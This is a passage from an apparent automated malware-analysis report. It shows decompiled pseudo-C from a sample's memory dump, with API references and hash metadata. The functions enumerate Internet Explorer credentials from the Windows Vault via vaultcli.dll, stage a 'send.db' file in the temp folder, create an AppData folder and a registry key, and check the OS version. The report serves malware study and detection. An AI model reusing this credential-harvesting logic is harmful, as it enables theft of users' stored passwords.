                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADBB
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADC9
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADD7
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID:
                                  • API String ID: 3664257935-0
                                  • Opcode ID: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction ID: 9f7ef04137cd162203068e8b633458ffaa87eefdd020305409dbc26cee2ce42b
                                  • Opcode Fuzzy Hash: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction Fuzzy Hash: 7AF0A571B04B16BED7495F758C84B86FE6AFF49260F01462B952C42221CB716434DFD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E0040A968(void* __ecx, void* __edx, void* __eflags) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				intOrPtr _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				char _v48;
                                  				char _v52;
                                  				char _v56;
                                  				char _v60;
                                  				char _v64;
                                  				char _v68;
                                  				char _v72;
                                  				char _v76;
                                  				char _v80;
                                  				char _v84;
                                  				char _v92;
                                  				char _v96;
                                  				char _v100;
                                  				void* _t124;
                                  				void* _t127;
                                  				intOrPtr _t129;
                                  				void* _t133;
                                  				intOrPtr _t147;
                                  				void* _t148;
                                  				void* _t159;
                                  				void* _t162;
                                  				void* _t186;
                                  				char _t226;
                                  				intOrPtr _t229;
                                  				char _t234;
                                  				void* _t235;
                                  
                                  				_t234 = 0;
                                  				_t186 = __ecx;
                                  				_t226 = 0;
                                  				_v16 = 0;
                                  				_v44 = 0;
                                  				_v20 = 0;
                                  				_v12 = 0;
                                  				_v8 = 0;
                                  				_v84 = 0;
                                  				if(E0040ACBE(__ecx) != 0) {
                                  					_push( &_v16);
                                  					_push(0);
                                  					_push(0x41c150);
                                  					if( *((intOrPtr*)(__ecx + 0x8c))() == 0) {
                                  						_push( &_v20);
                                  						_push( &_v44);
                                  						_push(0x200);
                                  						_push(_v16);
                                  						if( *((intOrPtr*)(__ecx + 0x94))() == 0) {
                                  							_t240 = _v44;
                                  							if(_v44 != 0) {
                                  								_v80 = 0;
                                  								_v40 = 0;
                                  								_v36 = 0;
                                  								do {
                                  									_t124 = E0040AC8B(_t240);
                                  									_push(0x10);
                                  									_push(0x41c140);
                                  									if(_t124 == 0) {
                                  										_push(_t226);
                                  										_v28 = _v20 + _v40;
                                  										_t127 = E00401000();
                                  										_t235 = _t235 + 0xc;
                                  										__eflags = _t127;
                                  										if(__eflags == 0) {
                                  											E004036F7( &_v32,  *((intOrPtr*)(_v28 + 0x10)));
                                  											_t133 = E0040335A( &_v32, E004036F7( &_v64, L"Internet Explorer"));
                                  											E00405FEB(_v64);
                                  											_v64 = _t234;
                                  											__eflags = _t133;
                                  											if(__eflags != 0) {
                                  												asm("movaps xmm0, [0x41a910]");
                                  												asm("movups [ebp-0x60], xmm0");
                                  												E00403549( &_v100, E004036F7( &_v68,  *((intOrPtr*)(_v8 + 0x14)) + 0x20));
                                  												E00405FEB(_v68);
                                  												_v68 = _t234;
                                  												E00403549( &_v96, E004036F7( &_v72,  *((intOrPtr*)(_v8 + 0x18)) + 0x20));
                                  												E00405FEB(_v72);
                                  												_v12 = _t234;
                                  												_t147 = _v28;
                                  												_v72 = _t234;
                                  												_t148 =  *((intOrPtr*)(_t186 + 0x98))(_v16, _t147,  *((intOrPtr*)(_t147 + 0x14)),  *((intOrPtr*)(_t147 + 0x18)), _t234, _t234, _t234,  &_v12);
                                  												__eflags = _t148;
                                  												if(_t148 == 0) {
                                  													_v8 = _v12;
                                  													__eflags =  *((intOrPtr*)(_v28 + 0x1c)) + 0x20;
                                  													E00403549( &_v84, E004036F7( &_v76,  *((intOrPtr*)(_v28 + 0x1c)) + 0x20));
                                  													E00405FEB(_v76);
                                  													_v76 = _t234;
                                  												}
                                  												_t235 = _t235 - 0x10;
                                  												E00401FF2(_t235,  &_v100);
                                  												E00402028(_t186);
                                  												E00401441( &_v100);
                                  											}
                                  											E00405FEB(_v32);
                                  											_v32 = _t234;
                                  											goto L18;
                                  										}
                                  									} else {
                                  										_t226 = _v36 + _v20;
                                  										_push(_t226);
                                  										_v8 = _t226;
                                  										_t159 = E00401000();
                                  										_t235 = _t235 + 0xc;
                                  										if(_t159 == 0) {
                                  											E004036F7( &_v24,  *((intOrPtr*)(_t226 + 0x10)));
                                  											_t162 = E0040335A( &_v24, E004036F7( &_v48, L"Internet Explorer"));
                                  											E00405FEB(_v48);
                                  											_v48 = _t234;
                                  											if(_t162 != 0) {
                                  												_t229 = _v8;
                                  												asm("movaps xmm0, [0x41a910]");
                                  												asm("movups [ebp-0x60], xmm0");
                                  												E00403549( &_v100, E004036F7( &_v52,  *((intOrPtr*)(_t229 + 0x14)) + 0x20));
                                  												E00405FEB(_v52);
                                  												_v52 = _t234;
                                  												E00403549( &_v96, E004036F7( &_v56,  *((intOrPtr*)(_t229 + 0x18)) + 0x20));
                                  												E00405FEB(_v56);
                                  												_v12 = _t234;
                                  												_push( &_v12);
                                  												_push(_t234);
                                  												_push(_t234);
                                  												_push(_t234);
                                  												_push( *((intOrPtr*)(_t229 + 0x18)));
                                  												_v56 = _t234;
                                  												_push( *((intOrPtr*)(_t229 + 0x14)));
                                  												_push(_t229);
                                  												_push(_v16);
                                  												if( *((intOrPtr*)(_t186 + 0x98))() == 0) {
                                  													_v8 = _v12;
                                  													E00403549( &_v92, E004036F7( &_v60,  *((intOrPtr*)(_v12 + 0x1c)) + 0x20));
                                  													E00405FEB(_v60);
                                  													_v60 = _t234;
                                  												}
                                  												_t235 = _t235 - 0x10;
                                  												E00401FF2(_t235,  &_v100);
                                  												E00402028(_t186);
                                  												E00401441( &_v100);
                                  											}
                                  											E00405FEB(_v24);
                                  											_v24 = _t234;
                                  											L18:
                                  											_t226 = _v8;
                                  										}
                                  									}
                                  									_v36 = _v36 + 0x38;
                                  									_t129 = _v80 + 1;
                                  									_v40 = _v40 + 0x34;
                                  									_v80 = _t129;
                                  								} while (_t129 < _v44);
                                  								_t234 = _v84;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				if(_v20 != 0) {
                                  					 *((intOrPtr*)(_t186 + 0xa0))(_v20);
                                  				}
                                  				if(_v16 != 0) {
                                  					 *((intOrPtr*)(_t186 + 0x90))( &_v16);
                                  				}
                                  				FreeLibrary( *(_t186 + 0xc0));
                                  				E00405FEB(_t234);
                                  				E00405FEB(0);
                                  				return E00405FEB(0);
                                  			}

                                  APIs
                                    • Part of subcall function 0040ACBE: LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040ACC6
                                  • FreeLibrary.KERNEL32(?), ref: 0040AC6B
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 0040335A: lstrcmpW.KERNEL32(?,?), ref: 00403364
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrarylstrcpylstrlen$LoadVirtuallstrcmp
                                  • String ID: 4$8$Internet Explorer
                                  • API String ID: 708496175-747916358
                                  • Opcode ID: 987e0d1a0c0a3e8625a8e7fe41084d22952dfade2afdb797a8586cc142086e5b
                                  • Instruction ID: a99aea2a735c9718559e27865e5f0cd770b9fcd1e9f38770a9e7eda6b777dcf3
                                  • Opcode Fuzzy Hash: 987e0d1a0c0a3e8625a8e7fe41084d22952dfade2afdb797a8586cc142086e5b
                                  • Instruction Fuzzy Hash: 98A13D70D00219ABCF14EFA6CC869EEBB79FF04708F14442AF401B7291DB78AA55CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00410F61() {
                                  				intOrPtr _v6;
                                  				signed int _v12;
                                  				intOrPtr _v272;
                                  				intOrPtr _v280;
                                  				intOrPtr _v284;
                                  				char _v288;
                                  				struct HINSTANCE__* _t33;
                                  				intOrPtr _t35;
                                  				intOrPtr _t38;
                                  				intOrPtr _t53;
                                  				intOrPtr _t62;
                                  				_Unknown_base(*)()* _t69;
                                  				void* _t71;
                                  
                                  				_v288 = 0x11c;
                                  				_t33 = LoadLibraryA("ntdll.dll");
                                  				if(_t33 == 0) {
                                  					L3:
                                  					_t71 = 2;
                                  					if(_v272 != _t71) {
                                  						goto L43;
                                  					} else {
                                  						_t35 = _v6;
                                  						if(_t35 != 1) {
                                  							if(_t35 == 2 || _t35 == 3) {
                                  								if(_v284 != 5) {
                                  									if(_v284 != 6) {
                                  										if(_v284 != 0xa || _v280 != 0) {
                                  											goto L43;
                                  										} else {
                                  											return (_v12 & 0x0000ffff) + 0x2710;
                                  										}
                                  									} else {
                                  										_t38 = _v280;
                                  										if(_t38 != 0) {
                                  											if(_t38 != 1) {
                                  												if(_t38 != _t71) {
                                  													if(_t38 != 3) {
                                  														goto L43;
                                  													} else {
                                  														return (_v12 & 0x0000ffff) + 0x189c;
                                  													}
                                  												} else {
                                  													return (_v12 & 0x0000ffff) + 0x1838;
                                  												}
                                  											} else {
                                  												return (_v12 & 0x0000ffff) + 0x17d4;
                                  											}
                                  										} else {
                                  											return (_v12 & 0x0000ffff) + 0x1770;
                                  										}
                                  									}
                                  								} else {
                                  									if(_v280 != 1) {
                                  										if(_v280 != _t71) {
                                  											goto L43;
                                  										} else {
                                  											return (_v12 & 0x0000ffff) + 0x1450;
                                  										}
                                  									} else {
                                  										return (_v12 & 0x0000ffff) + 0x13ec;
                                  									}
                                  								}
                                  							} else {
                                  								goto L43;
                                  							}
                                  						} else {
                                  							if(_v284 != 5) {
                                  								if(_v284 != 6) {
                                  									if(_v284 != 0xa || _v280 != 0) {
                                  										goto L43;
                                  									} else {
                                  										return (_v12 & 0x0000ffff) + 0x3e8;
                                  									}
                                  								} else {
                                  									_t53 = _v280;
                                  									if(_t53 != 0) {
                                  										if(_t53 != 1) {
                                  											if(_t53 != _t71) {
                                  												if(_t53 != 3) {
                                  													goto L43;
                                  												} else {
                                  													return (_v12 & 0x0000ffff) + 0x276;
                                  												}
                                  											} else {
                                  												return (_v12 & 0x0000ffff) + 0x26c;
                                  											}
                                  										} else {
                                  											return (_v12 & 0x0000ffff) + 0x262;
                                  										}
                                  									} else {
                                  										return (_v12 & 0x0000ffff) + 0x258;
                                  									}
                                  								}
                                  							} else {
                                  								_t62 = _v280;
                                  								if(_t62 != 0) {
                                  									if(_t62 != 1) {
                                  										if(_t62 != _t71) {
                                  											goto L43;
                                  										} else {
                                  											return (_v12 & 0x0000ffff) + 0x208;
                                  										}
                                  									} else {
                                  										return (_v12 & 0x0000ffff) + 0x1fe;
                                  									}
                                  								} else {
                                  									return (_v12 & 0x0000ffff) + 0x1f4;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_t69 = GetProcAddress(_t33, "RtlGetVersion");
                                  					if(_t69 == 0) {
                                  						L43:
                                  						return 0;
                                  					} else {
                                  						 *_t69( &_v288);
                                  						goto L3;
                                  					}
                                  				}
                                  			}

                                  0x00410f6f
                                  0x00410f79
                                  0x00410f81
                                  0x00410fa0
                                  0x00410fa2
                                  0x00410fa9
                                  0x00000000
                                  0x00410faf
                                  0x00410faf
                                  0x00410fb4
                                  0x00411073
                                  0x00411084
                                  0x004110b4
                                  0x00411101
                                  0x00000000
                                  0x0041110c
                                  0x00411116
                                  0x00411116
                                  0x004110b6
                                  0x004110b6
                                  0x004110be
                                  0x004110ce
                                  0x004110dd
                                  0x004110ed
                                  0x00000000
                                  0x004110ef
                                  0x004110f9
                                  0x004110f9
                                  0x004110df
                                  0x004110e9
                                  0x004110e9
                                  0x004110d0
                                  0x004110da
                                  0x004110da
                                  0x004110c0
                                  0x004110ca
                                  0x004110ca
                                  0x004110be
                                  0x00411086
                                  0x0041108d
                                  0x004110a0
                                  0x00000000
                                  0x004110a2
                                  0x004110ac
                                  0x004110ac
                                  0x0041108f
                                  0x00411099
                                  0x00411099
                                  0x0041108d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00410fba
                                  0x00410fc1
                                  0x00411002
                                  0x00411053
                                  0x00000000
                                  0x00411066
                                  0x00411070
                                  0x00411070
                                  0x00411004
                                  0x00411004
                                  0x0041100c
                                  0x0041101c
                                  0x0041102b
                                  0x0041103b
                                  0x00000000
                                  0x00411041
                                  0x0041104b
                                  0x0041104b
                                  0x0041102d
                                  0x00411037
                                  0x00411037
                                  0x0041101e
                                  0x00411028
                                  0x00411028
                                  0x0041100e
                                  0x00411018
                                  0x00411018
                                  0x0041100c
                                  0x00410fc3
                                  0x00410fc3
                                  0x00410fcb
                                  0x00410fdb
                                  0x00410fea
                                  0x00000000
                                  0x00410ff0
                                  0x00410ffa
                                  0x00410ffa
                                  0x00410fdd
                                  0x00410fe7
                                  0x00410fe7
                                  0x00410fcd
                                  0x00410fd7
                                  0x00410fd7
                                  0x00410fcb
                                  0x00410fc1
                                  0x00410fb4
                                  0x00410f83
                                  0x00410f89
                                  0x00410f91
                                  0x00411117
                                  0x0041111a
                                  0x00410f97
                                  0x00410f9e
                                  0x00000000
                                  0x00410f9e
                                  0x00410f91

                                  APIs
                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410F79
                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410F89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RtlGetVersion$ntdll.dll
                                  • API String ID: 2574300362-1489217083
                                  • Opcode ID: 0b4d11267f930e399cf0cd0a18d96ed91b6d59d4babc8823783d36d27fe86c1a
                                  • Instruction ID: 559b4bd9e640983aade5312b2b5afba222edb0c69bc3aa9439dd4f75701b01ff
                                  • Opcode Fuzzy Hash: 0b4d11267f930e399cf0cd0a18d96ed91b6d59d4babc8823783d36d27fe86c1a
                                  • Instruction Fuzzy Hash: 16413830E0016CAADF248B55DC473FEB6B49B1A74DF0004E6E745E1691E27CCEC5CA58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E004152FD(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
                                  				char _v8;
                                  				signed int _v28;
                                  				char _v32;
                                  				short _v2080;
                                  				void* _t42;
                                  				void* _t47;
                                  
                                  				_t42 = __edx;
                                  				 *((intOrPtr*)(__ebx + 0x46183c1)) =  *((intOrPtr*)(__ebx + 0x46183c1)) + __ecx;
                                  				_t47 = __ecx;
                                  				E00401052( &_v2080, 0, 0x400);
                                  				GetTempPathW(0x400,  &_v2080);
                                  				lstrcatW( &_v2080, L"send.db");
                                  				_t48 = _t47 + 4;
                                  				E00403549(_t47 + 4, E004036F7( &_v8,  &_v2080));
                                  				E00405FEB(_v8);
                                  				_t12 =  &_v28;
                                  				_v28 = _v28 & 0x00000000;
                                  				asm("xorps xmm0, xmm0");
                                  				_v32 = 0x35;
                                  				asm("movups [ebp-0x14], xmm0");
                                  				E0040378B(E00403873( &_v32, _t42, _t48),  *_t12, _a4);
                                  				E00403777( &_v32);
                                  				return _a4;
                                  			}

                                  0x004152fd
                                  0x004152ff
                                  0x00415321
                                  0x00415323
                                  0x00415333
                                  0x00415345
                                  0x00415351
                                  0x00415360
                                  0x00415368
                                  0x00415370
                                  0x00415370
                                  0x00415377
                                  0x0041537a
                                  0x00415382
                                  0x0041538d
                                  0x00415395
                                  0x004153a0

                                  APIs
                                  • GetTempPathW.KERNEL32(00000400,?), ref: 00415333
                                  • lstrcatW.KERNEL32 ref: 00415345
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                  • String ID: 5$send.db
                                  • API String ID: 891666058-2022884741
                                  • Opcode ID: 6f2748a7ab57c544cae23041cd7314a3fdbf5af7460574273ea6893a900eae3a
                                  • Instruction ID: d0947e770b90053afdf585e4db67557909fa3e1f37a5b6bb773202aecca51e71
                                  • Opcode Fuzzy Hash: 6f2748a7ab57c544cae23041cd7314a3fdbf5af7460574273ea6893a900eae3a
                                  • Instruction Fuzzy Hash: 59115E71D40119ABCB10EBA1DC46FEE7BBCAF50349F00807AB405B6191EB789B468BD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E00415307(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                  				char _v8;
                                  				signed int _v28;
                                  				char _v32;
                                  				short _v2080;
                                  				void* _t35;
                                  				void* _t37;
                                  
                                  				_t35 = __edx;
                                  				_t37 = __ecx;
                                  				E00401052( &_v2080, 0, 0x400);
                                  				GetTempPathW(0x400,  &_v2080);
                                  				lstrcatW( &_v2080, L"send.db");
                                  				_t38 = _t37 + 4;
                                  				E00403549(_t37 + 4, E004036F7( &_v8,  &_v2080));
                                  				E00405FEB(_v8);
                                  				_t8 =  &_v28;
                                  				_v28 = _v28 & 0x00000000;
                                  				asm("xorps xmm0, xmm0");
                                  				_v32 = 0x35;
                                  				asm("movups [ebp-0x14], xmm0");
                                  				E0040378B(E00403873( &_v32, _t35, _t38),  *_t8, _a4);
                                  				E00403777( &_v32);
                                  				return _a4;
                                  			}

                                  0x00415307
                                  0x00415321
                                  0x00415323
                                  0x00415333
                                  0x00415345
                                  0x00415351
                                  0x00415360
                                  0x00415368
                                  0x00415370
                                  0x00415370
                                  0x00415377
                                  0x0041537a
                                  0x00415382
                                  0x0041538d
                                  0x00415395
                                  0x004153a0

                                  APIs
                                  • GetTempPathW.KERNEL32(00000400,?), ref: 00415333
                                  • lstrcatW.KERNEL32 ref: 00415345
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                  • String ID: 5$send.db
                                  • API String ID: 891666058-2022884741
                                  • Opcode ID: 30474245352a8b012b952eb90b0fcc539b311df8baacde9dd35af5fe4a626525
                                  • Instruction ID: b9129dd2177f5d91cb3c2605560a9b03bc3764b0432bab46560860ad6b854e10
                                  • Opcode Fuzzy Hash: 30474245352a8b012b952eb90b0fcc539b311df8baacde9dd35af5fe4a626525
                                  • Instruction Fuzzy Hash: E1013C71D40119ABCB10EB61DC46FEE7BBCAF54309F00807AB505B2191EB789B468BD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E0041579A(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
                                  				char _v8;
                                  				char _v28;
                                  				char _v32;
                                  				short _v552;
                                  				void* _t41;
                                  				void* _t42;
                                  				void* _t45;
                                  
                                  				_t41 = __edx;
                                  				 *((intOrPtr*)(__ebx - 0x74aa3c3f)) =  *((intOrPtr*)(__ebx - 0x74aa3c3f)) + __ecx + 1;
                                  				_v8 = 0;
                                  				E00401052( &_v552, 0, 0x208);
                                  				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552, _t42, _t45);
                                  				lstrcatW( &_v552, L"\\Microsoft Vision\\");
                                  				E0040357C( &_v8, _t41, 0,  &_v552);
                                  				_v32 = 0x3b;
                                  				asm("xorps xmm0, xmm0");
                                  				_v28 = 0;
                                  				asm("movups [ebp-0x14], xmm0");
                                  				E0040378B(E00403873( &_v32, _t41,  &_v8), 0, _a4);
                                  				E00403777( &_v32);
                                  				E00405FEB(_v8);
                                  				return _a4;
                                  			}

                                  0x0041579a
                                  0x0041579d
                                  0x004157ba
                                  0x004157bd
                                  0x004157d1
                                  0x004157e3
                                  0x004157f3
                                  0x004157fe
                                  0x00415805
                                  0x00415808
                                  0x0041580f
                                  0x0041581a
                                  0x00415822
                                  0x0041582a
                                  0x00415834

                                  APIs
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004157D1
                                  • lstrcatW.KERNEL32 ref: 004157E3
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FolderFreePathVirtuallstrcat
                                  • String ID: ;$\Microsoft Vision\
                                  • API String ID: 1529938272-253167065
                                  • Opcode ID: e1f543ee66d075d9957e2bbf340ec3783308addc8351dc4c6c8c35eeb8be1d21
                                  • Instruction ID: bab513efa4ed7bf9b340fce4efe21c66aceecf9db260b5e240e0963f2cc01e74
                                  • Opcode Fuzzy Hash: e1f543ee66d075d9957e2bbf340ec3783308addc8351dc4c6c8c35eeb8be1d21
                                  • Instruction Fuzzy Hash: 5F115EB1C40119AACB10EFA1DD49EEFBFB8EF19344F1041AAF505B2091DB38AB45CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 66%
                                  			E004157A1(void* __ecx, void* __edx, intOrPtr _a4) {
                                  				char _v8;
                                  				char _v28;
                                  				char _v32;
                                  				short _v552;
                                  				void* _t34;
                                  
                                  				_t34 = __edx;
                                  				_v8 = 0;
                                  				E00401052( &_v552, 0, 0x208);
                                  				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552);
                                  				lstrcatW( &_v552, L"\\Microsoft Vision\\");
                                  				E0040357C( &_v8, _t34, 0,  &_v552);
                                  				_v32 = 0x3b;
                                  				asm("xorps xmm0, xmm0");
                                  				_v28 = 0;
                                  				asm("movups [ebp-0x14], xmm0");
                                  				E0040378B(E00403873( &_v32, _t34,  &_v8), 0, _a4);
                                  				E00403777( &_v32);
                                  				E00405FEB(_v8);
                                  				return _a4;
                                  			}

                                  0x004157a1
                                  0x004157ba
                                  0x004157bd
                                  0x004157d1
                                  0x004157e3
                                  0x004157f3
                                  0x004157fe
                                  0x00415805
                                  0x00415808
                                  0x0041580f
                                  0x0041581a
                                  0x00415822
                                  0x0041582a
                                  0x00415834

                                  APIs
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004157D1
                                  • lstrcatW.KERNEL32 ref: 004157E3
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FolderFreePathVirtuallstrcat
                                  • String ID: ;$\Microsoft Vision\
                                  • API String ID: 1529938272-253167065
                                  • Opcode ID: ae987deb636bde6e6a9704bff2257c3adb5749e056cb561f849882f6733134c3
                                  • Instruction ID: 19a63838f8e1e6d763b3ca3dd868f266859aef75a557a0161fa2b0bf50ee1775
                                  • Opcode Fuzzy Hash: ae987deb636bde6e6a9704bff2257c3adb5749e056cb561f849882f6733134c3
                                  • Instruction Fuzzy Hash: D70109B1C40119AACB10EBA1DD49EEFBBBCAF18344F10416AB505A2191EB78AB45CBD4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412F0D(void* __ecx) {
                                  				char _v8;
                                  				short* _t10;
                                  
                                  				_t1 =  &_v8; // 0x41306c
                                  				_t10 = L"SOFTWARE\\Microsoft\\Control Panel\\";
                                  				if(RegOpenKeyExW(0x80000001, _t10, 0, 0xf003f, _t1) == 2) {
                                  					_t2 =  &_v8; // 0x41306c
                                  					RegCreateKeyExW(0x80000001, _t10, 0, 0, 0, 0xf003f, 0, _t2, 0);
                                  				}
                                  				_t3 =  &_v8; // 0x41306c
                                  				return  *_t3;
                                  			}

                                  0x00412f14
                                  0x00412f20
                                  0x00412f35
                                  0x00412f38
                                  0x00412f47
                                  0x00412f47
                                  0x00412f4d
                                  0x00412f54

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,000F003F,l0A,00000000,767182ED,766F13E0,?,?,0041306C), ref: 00412F2C
                                  • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,00000000,00000000,000F003F,00000000,l0A,00000000,?,?,0041306C), ref: 00412F47
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateOpen
                                  • String ID: SOFTWARE\Microsoft\Control Panel\$l0A
                                  • API String ID: 436179556-2156092134
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E004133B6(CHAR* __ecx, void* __edx, long _a4) {
                                  				long _v8;
                                  				int _t4;
                                  				void* _t13;
                                  				void* _t16;
                                  
                                  				_push(__ecx);
                                  				_t13 = __edx;
                                  				_v8 = 0;
                                  				_t4 = CreateFileA(__ecx, 0x40000000, 0, 0, 2, 0, 0);
                                  				_t16 = _t4;
                                  				if(_t16 != 0xffffffff) {
                                  					WriteFile(_t16, _t13, _a4,  &_v8, 0);
                                  					_t4 = CloseHandle(_t16);
                                  				}
                                  				return _t4;
                                  			}


                                  APIs
                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004133D0
                                  • WriteFile.KERNEL32(00000000,?,74A313FB,00000000,00000000), ref: 004133E7
                                  • CloseHandle.KERNEL32(00000000), ref: 004133EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleWrite
                                  • String ID: :start
                                  • API String ID: 1065093856-1299720186
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E004109ED() {
                                  				intOrPtr _v6;
                                  				char _v288;
                                  				struct HINSTANCE__* _t4;
                                  				intOrPtr _t5;
                                  				_Unknown_base(*)()* _t9;
                                  
                                  				_v288 = 0x11c;
                                  				_t4 = LoadLibraryA("ntdll.dll");
                                  				if(_t4 == 0) {
                                  					L3:
                                  					_t5 = _v6;
                                  					if(_t5 == 2 || _t5 == 3) {
                                  						return 1;
                                  					} else {
                                  						goto L5;
                                  					}
                                  				} else {
                                  					_t9 = GetProcAddress(_t4, "RtlGetVersion");
                                  					if(_t9 == 0) {
                                  						L5:
                                  						return 0;
                                  					} else {
                                  						 *_t9( &_v288);
                                  						goto L3;
                                  					}
                                  				}
                                  			}


                                  APIs
                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410A05
                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410A15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RtlGetVersion$ntdll.dll
                                  • API String ID: 2574300362-1489217083
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00410A3C() {
